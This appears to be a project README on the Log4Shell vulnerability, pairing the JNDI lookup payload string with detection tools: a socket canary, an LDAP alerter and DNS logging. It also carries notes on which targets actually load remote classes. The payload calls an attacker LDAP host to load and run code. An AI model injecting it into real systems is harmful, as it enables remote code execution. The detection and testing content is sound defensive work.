Log4Shell
Log4Shell Zero-Day Exploit Proof of Concept
Log4Shell Zero-Day Exploit
If an attacker manages to get the string `${jndi:ldap://someaddresshere/param1=value1}` logged by Log4j, Log4j resolves the JNDI lookup and loads the class (Java bytecode) referenced by the attacker-controlled LDAP server. That bytecode can be used to execute any malicious code, or to do some little trolling.
Take this with a grain of salt; I'm not a security expert.
inb4:
https://user-images.githubusercontent.com/49940811/176066056-e96eef48-42f2-47d3-b270-477c2a19b654.mp4
Detection
Patched
- Mitigated by deleting the `org.apache.logging.log4j.core.lookup.JndiLookup` class; somehow it didn't crash.
Unpatched
- Note: RCE exploit against a 1.16.5 Minecraft server

MainDetector.java
Uses a plain socket to listen on port 1389 and closes the socket as soon as a client connects; no external dependency.
- Note: not always the case; sometimes the target doesn't bother to load the class from the URL location given by the LDAP server.
- Vulnerable to lookup:

- Log:

It's going to throw an error if the target is vulnerable.
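A canary listener in the spirit of MainDetector.java, added here as an example (not the project's own code): it accepts on port 1389, records the address of whichever host performed the lookup, and closes without sending any LDAP response, so nothing is ever served. The class name `JndiCanaryListener` and its methods are assumptions.

```java
import java.io.IOException;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.SocketTimeoutException;
import java.time.Instant;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

// Hypothetical canary: a vulnerable Log4j opens a TCP connection here when it
// resolves ${jndi:ldap://<this-host>:1389/x}. We never speak LDAP, so no class
// is served; the victim only logs a connection error and we log who connected.
public class JndiCanaryListener implements Runnable {
    private final int port;
    private final List<String> hits = Collections.synchronizedList(new ArrayList<>());
    private volatile boolean running = true;

    public JndiCanaryListener(int port) { this.port = port; }

    public List<String> hits() { return hits; }   // one entry per lookup seen
    public void stop() { running = false; }

    @Override
    public void run() {
        try (ServerSocket server = new ServerSocket(port)) {
            server.setSoTimeout(1000); // wake up every second to honour stop()
            while (running) {
                try (Socket client = server.accept()) {
                    // The remote address is the host whose Log4j did the lookup.
                    String hit = Instant.now() + " lookup from "
                            + client.getInetAddress().getHostAddress() + ":" + client.getPort();
                    hits.add(hit);
                    System.out.println("[canary] " + hit);
                } catch (SocketTimeoutException ignored) {
                    // no connection in the last second; loop and re-check running
                }
            }
        } catch (IOException e) {
            throw new RuntimeException("canary listener failed on port " + port, e);
        }
    }

    public static void main(String[] args) throws Exception {
        int port = args.length > 0 ? Integer.parseInt(args[0]) : 1389;
        Thread t = new Thread(new JndiCanaryListener(port), "jndi-canary");
        t.start();
        t.join(); // runs until the process is killed
    }
}
```

Point a test Log4j instance at `${jndi:ldap://<canary-host>:1389/x}`; a hit in the canary output shows the lookup was performed, while (as the note above says) it does not by itself prove the remote class would be loaded.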
MainAlerter.java
Uses the `com.unboundid:unboundid-ldapsdk` library to host an LDAP server.
- Note: a lookup reaching the server doesn't mean the target is vulnerable to the RCE exploit.
- Vulnerable to lookup:

- LDAP server logs:

DNS Log
Both the sender and the receiver are logged, which means both of them are vulnerable to the lookup.
- Note: a DNS request being logged doesn't mean the target is vulnerable to RCE.
- Vulnerable to lookup:

Conclusion
- A Java process doing the LDAP lookup doesn't mean it is always vulnerable, but if it loads the class from the provided codebase then it presumably is.
- Vulnerable to RCE and LDAP lookup:

- Not vulnerable to RCE because Java doesn't fetch the bytecode (??), but still vulnerable to LDAP lookup:

- Vulnerable to RCE and LDAP lookup:
- To test whether it's actually vulnerable to RCE, use a harmless payload; if it runs, the target is vulnerable.
- If the `com.sun.jndi.ldap.object.trustURLCodebase` property is set to `true` then you are really vulnerable; otherwise the attacker can still use classes already present on the existing classpath.
- If you look at the victim's log and see this:

```
Caused by: java.lang.ClassNotFoundException: itzbenz.payload.ObjectPayloadSerializable
    at java.net.URLClassLoader.findClass(Unknown Source)
    at java.lang.ClassLoader.loadClass(Unknown Source)
    at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
    at java.lang.ClassLoader.loadClass(Unknown Source)
```

it's safe from the remote class load because it won't load the class from the attacker-provided codebase (??), though it's still doing the LDAP lookup, which is a large attack surface.
Note: after updating Java 8, the Minecraft server seems not to load the class from the remote codebase.
Disclaimer
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.